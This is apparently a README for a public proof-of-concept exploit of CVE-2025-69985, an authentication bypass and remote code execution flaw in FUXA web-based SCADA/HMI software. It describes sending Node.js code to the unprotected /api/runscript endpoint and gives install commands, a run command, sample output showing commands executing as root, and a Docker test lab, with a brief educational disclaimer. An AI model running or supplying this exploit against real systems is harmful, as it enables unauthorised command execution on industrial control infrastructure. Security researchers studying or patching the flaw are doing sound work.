Share
## https://sploitus.com/exploit?id=A3B60E4F-DE9F-5D1A-A90F-52D4AA273ACC
FUXA โ‰ค 1.2.8 Auth Bypass + RCE (CVE-2025-69985)


    
    
      
    


## ๐Ÿ“œ Description 
This Python exploit targets CVE-2025-69985, a critical authentication bypass vulnerability in FUXA (web-based SCADA/HMI software) versions โ‰ค 1.2.8. By sending a crafted JSON payload with embedded Node.js code to the unprotected /api/runscript endpoint, it achieves remote command execution as the FUXA process โ€” capturing full stdout/stderr synchronously in the response.

## ๐Ÿ› ๏ธ Installation
> [!NOTE]
> To ensure a clean and isolated environment for the project dependencies, it's recommended to use Python's `venv` module.

### OSX/Linux
```bash
git clone https://github.com/joshuavanderpoll/CVE-2025-69985.git
cd CVE-2025-69985
python3 -m venv .venv
source .venv/bin/activate
pip3 install -r requirements.txt
```

### Windows
```bash
git clone https://github.com/joshuavanderpoll/CVE-2025-69985.git
cd CVE-2025-69985
python -m venv .venv 
.venv\Scripts\activate
pip3 install -r requirements.txt
```

## โš™๏ธ Usage
```bash
python3 CVE-2025-69985.py -u http://localhost:1881/ -c whoami

 Target : http://localhost:1881
 Command: whoami

[*] Preparing payload โ†’ executing: whoami
[*] Sending exploit request to /api/runscript ...
[*] Response status: 200
[+] Command executed successfully (CVE-2025-69985 bypass)!

=== COMMAND OUTPUT ===
"root\n"
======================


======================================================================
 Exploit completed!.
======================================================================
```

## ๐Ÿ‹ Docker PoC
```bash
cd docker/
docker compose down
docker compose up -d
# You can test at --url http://127.0.0.1:1881/
```

## ๐Ÿ’ป Example
![Execute PoC](/assets/preview.jpg)

## ๐Ÿ“ข Disclaimer
This tool is provided for educational and research purposes only. The creator assumes no responsibility for any misuse or damage caused by the tool.